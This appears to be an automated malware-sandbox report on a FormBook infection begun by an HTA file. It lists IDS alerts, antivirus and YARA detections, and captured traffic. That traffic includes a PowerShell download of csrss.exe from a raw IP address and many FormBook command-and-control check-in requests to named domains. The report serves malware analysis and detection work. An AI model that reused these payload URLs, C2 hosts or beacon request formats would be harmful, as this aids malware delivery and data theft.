2025-04-14T23:12:35.755099+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49728 | 13.248.169.48 | 80 | TCP
2025-04-14T23:12:38.465069+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49729 | 13.248.169.48 | 80 | TCP
2025-04-14T23:12:46.697722+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 209.74.80.150 | 80 | TCP
2025-04-14T23:12:49.446257+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 209.74.80.150 | 80 | TCP
2025-04-14T23:12:52.150705+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 209.74.80.150 | 80 | TCP
2025-04-14T23:13:01.402509+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 38.181.35.142 | 80 | TCP
2025-04-14T23:13:04.252907+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 38.181.35.142 | 80 | TCP
2025-04-14T23:13:07.106660+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 38.181.35.142 | 80 | TCP
2025-04-14T23:13:23.814623+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 172.67.207.82 | 80 | TCP
2025-04-14T23:13:26.480508+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 172.67.207.82 | 80 | TCP
2025-04-14T23:13:29.145020+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 172.67.207.82 | 80 | TCP
2025-04-14T23:13:42.306386+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 13.248.169.48 | 80 | TCP
2025-04-14T23:13:44.970327+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 13.248.169.48 | 80 | TCP
2025-04-14T23:13:48.652717+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 13.248.169.48 | 80 | TCP
2025-04-14T23:13:56.805364+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 13.248.169.48 | 80 | TCP
2025-04-14T23:13:59.473474+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 13.248.169.48 | 80 | TCP
2025-04-14T23:14:02.156332+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 13.248.169.48 | 80 | TCP
2025-04-14T23:14:14.095681+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 104.21.41.226 | 80 | TCP
2025-04-14T23:14:16.738102+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 104.21.41.226 | 80 | TCP
2025-04-14T23:14:19.459034+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 104.21.41.226 | 80 | TCP
2025-04-14T23:14:27.555993+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 3.33.130.190 | 80 | TCP
2025-04-14T23:14:30.170089+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 3.33.130.190 | 80 | TCP
2025-04-14T23:14:32.850234+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 3.33.130.190 | 80 | TCP
2025-04-14T23:14:41.560742+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 104.21.33.132 | 80 | TCP
2025-04-14T23:14:44.209657+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49760 | 104.21.33.132 | 80 | TCP
2025-04-14T23:14:46.873394+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49761 | 104.21.33.132 | 80 | TCP
2025-04-14T23:14:55.058847+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 13.248.169.48 | 80 | TCP
2025-04-14T23:14:57.716275+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49764 | 13.248.169.48 | 80 | TCP
2025-04-14T23:15:00.387331+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 13.248.169.48 | 80 | TCP
2025-04-14T23:15:17.206850+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49767 | 144.76.229.203 | 80 | TCP
2025-04-14T23:15:19.958060+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 144.76.229.203 | 80 | TCP
2025-04-14T23:15:23.267775+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49769 | 144.76.229.203 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-14T23:13:23.814623+0200 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 172.67.207.82 | 80 | TCP


AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csrss[1].exe; ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\csrss.exe; ReversingLabs: Detection: 79%
Source: fgd.hta; Virustotal: Detection: 42%
Source: fgd.hta; ReversingLabs: Detection: 30%
Source: Yara match; File source: 17.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000016.00000002.3629881400.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.3625364823.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.3627870487.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.3627956403.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1583072891.0000000035BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1552868362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.3628025430.0000000002940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1579411162.00000000311A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Neural Call Log Analysis: 99.8%
Source: Binary string: sysinfo.pdb | source: iaoqralA.pif, 00000011.00000003.1552676010.000000003073C000.00000004.00000020.00020000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000003.1745667826.0000000000C85000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: sysinfo.pdbGCTL | source: iaoqralA.pif, 00000011.00000003.1552676010.000000003073C000.00000004.00000020.00020000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000003.1745667826.0000000000C85000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb | source: csrss.exe, 0000000C.00000003.1284464034.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1357966873.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002DC3000.00000004.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1552868362.0000000000890000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: iaoqralA.pif, 00000011.00000002.1578995083.0000000030C50000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1578995083.0000000030DEE000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1455002943.0000000030AA9000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1453030442.00000000308F8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.000000000446E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1555580776.0000000004122000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1553037907.0000000003F7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: iaoqralA.pif, iaoqralA.pif, 00000011.00000002.1578995083.0000000030C50000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1578995083.0000000030DEE000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1455002943.0000000030AA9000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1453030442.00000000308F8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000015.00000002.3628185993.000000000446E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1555580776.0000000004122000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1553037907.0000000003F7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: q7C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.pdb | source: powershell.exe, 00000003.00000002.1354721983.0000000005559000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL | source: csrss.exe, 0000000C.00000003.1284464034.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1357966873.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002DC3000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1284975349.000000000088B000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1552868362.0000000000890000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3626732569.00000000009BF000.00000002.00000001.01000000.0000000F.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000000.1622712741.00000000009BF000.00000002.00000001.01000000.0000000F.sdmp
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 12_2_038054D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA | 12_2_038054D0
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 21_2_0241C530 FindFirstFileW,FindNextFileW,FindClose | 21_2_0241C530
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 4x nop then xor eax, eax | 21_2_02409EC0
Source: C:\Windows\SysWOW64\systeminfo.exe | Code function: 4x nop then mov ebx, 00000004h | 21_2_041C04E8

                        Networking

Source: Network traffic | Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 192.3.26.143:80 -> 192.168.2.4:49714
Source: Network traffic | Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 192.3.26.143:80 -> 192.168.2.4:49714
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49730 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49730 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49725 -> 192.197.113.156:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49725 -> 192.197.113.156:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49734 -> 209.74.80.150:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49734 -> 209.74.80.150:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 172.67.207.82:80
Source: Network traffic | Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49739 -> 172.67.207.82:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49738 -> 38.181.35.142:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49738 -> 38.181.35.142:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49762 -> 104.21.33.132:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49762 -> 104.21.33.132:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49728 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49736 -> 38.181.35.142:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49733 -> 209.74.80.150:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49746 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49746 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49727 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49750 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49750 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 104.21.33.132:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49741 -> 172.67.207.82:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 104.21.41.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49732 -> 209.74.80.150:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 104.21.41.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49731 -> 209.74.80.150:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49729 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49758 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 172.67.207.82:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49735 -> 38.181.35.142:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 38.181.35.142:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49761 -> 104.21.33.132:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49758 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 172.67.207.82:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49742 -> 172.67.207.82:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 104.21.41.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 104.21.33.132:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49754 -> 104.21.41.226:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49754 -> 104.21.41.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49766 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49766 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 13.248.169.48:80
Source: DNS query: www.computational360.xyz
Source: DNS query: www.royalbond.xyz
Source: DNS query: www.genericagi.xyz
Source: DNS query: www.031233793.xyz
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Mon, 14 Apr 2025 21:11:21 GMT | Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 | Last-Modified: Thu, 10 Apr 2025 09:37:53 GMT | ETag: "19b000-632695705e92b" | Accept-Ranges: bytes | Content-Length: 1683456 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
Source: Joe Sandbox View | IP Address: 144.76.229.203
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: unknown | TCP traffic detected without corresponding DNS query: 192.3.26.143
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04CB7A18 URLDownloadToFileW | 3_2_04CB7A18
Source: global traffic | HTTP traffic detected: GET /470/csrss.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 192.3.26.143 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /tbxt/?TX=ZfptzlkHuF8dA&XNRPF=Iqu27JV6RtB5rwbZDX5Xj3Q07mzts76C71HEWnCl1r6gTdDm+5MFdqapX6KFcoaemzdW+bJMUEQ6mPDpHKBTkNotdagcGd63/5na5/daV6XA9071WzQg1Lk= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.72422.pink | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic | HTTP traffic detected: GET /c6g4/?XNRPF=RNZMSqcedGWBg2TWL3dvjPIiBAAhqoaslf8Dfsx/arayUyYyOnUvY1yeRgX28wL25sy8+E+PkSfs0QcIoRMaoOQ18jQLdliFZxRw60RRegyP3GOnA+tLh/Y=&TX=ZfptzlkHuF8dA HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.wavekeith.media | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic | HTTP traffic detected: GET /bpdk/?XNRPF=Qd+AbDlML76Asp7XBEUygELi0p4/k2xePBuu7Alv7PtIyWqe0sOmlfN5AzVKPyVHj8GaIG6tBp5tN59gjWFGjuEAm8KQg3624LwicQ3Zn9PamxaY3DWuqOI=&TX=ZfptzlkHuF8dA HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.lifway.life | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic | HTTP traffic detected: GET /m2co/?XNRPF=KkhKztOrouYdO6KmSdVUgLYo1gON6qdiuilzw+5EZsUSRbPhfJs15SPe6okTiDbvjrFGHVzshQWoM28L+pgrBLH3Amr/osRwwRkJK24dSDVG/SvZlnj5ox8=&TX=ZfptzlkHuF8dA HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.zthzzyg.top | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic | HTTP traffic detected: GET /3p3g/?TX=ZfptzlkHuF8dA&XNRPF=iMhxCdjUV/TrjIIrSbgJiBzlfbPvXeB1b/FvKb0FVvQIbLCrJTzusqU6dF4+LG7IdS8ixPp3hKapNstlr5uZ2A3bH7nuqgnCpesw4Ee1mjbc+A7wxXnEa2w= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.shangaccurate.shop | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic | HTTP traffic detected: GET /3r3z/?XNRPF=YQ8ZZq6XMKPnjz/qISwhOQujwS21u6HiMm5ivx01j/mQRuIIYB8tvYmmPTqC43FBis8hwv0SAWQcXWoI20kI2f8x3SUt6uTm+aF62MiS0ITF2QPWQazJfiI=&TX=ZfptzlkHuF8dA HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.computational360.xyz | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic | HTTP traffic detected: GET /eepn/?TX=ZfptzlkHuF8dA&XNRPF=dw5QcprGFkd3XjcSlcTHnWIEZo66L3B5Sxt42+0aBAO22L33GMr9EjFNLPJuM1H8ccFUZjjFPJRZej0JFBBHhfNB2WRfxJu/Q8zOKbhzUJdDqVKraJvic7Y= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.royalbond.xyz | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic | HTTP traffic detected: GET /h118/?XNRPF=1g7UryuS5x0Wh4uR0vetP8EEjI0kAORsn0dp/kTbv45J576FJpAlxx5tgSklMWqt1aN3gixLCN0pen2hBoAXldE7PqKhQHV9UeyktvAeRZfocWuA0Q63t8M=&TX=ZfptzlkHuF8dA HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.conegame.biz | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic | HTTP traffic detected: GET /vjjz/?XNRPF=sDMMZFCSf8nQmR4Cx9ZHTch/IhEYmhOnDkSMZuV+ydBLyXYj1ihO2SPAc2dyEqEjjDD1ouTgtkh5JSFCPscCEOwOj3W4pfi4KwuPCOTdvHNi11PIrSE/El4=&TX=ZfptzlkHuF8dA HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.venturegioballng.fun | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic | HTTP traffic detected: GET /vewx/?XNRPF=q2VnHaWrZNtFWK3esx5pNN9CMEky8bXB1qj8hoVqDlE05AGLfggHghSsL/krXljcEHcHk48t2T8TshCsFpmcJkU9IPSDLFmVQG5IS49OmjGRviG6ox9lUfQ=&TX=ZfptzlkHuF8dA HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.click68vp.store | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
Source: global traffic | HTTP traffic detected: GET /di53/?XNRPF=tUuxyfOAwGqd7slYd5uQTag0RaWGyxd1nx3sKr6ARPyCVgX9LZGvthyJhYnR3R//VHqTuRk3kyGYXUXFIQp+/oBV3FSfxZl7MtfHgVSNLmzHE+bTcStJpEM=&TX=ZfptzlkHuF8dA HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Host: www.genericagi.xyz | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
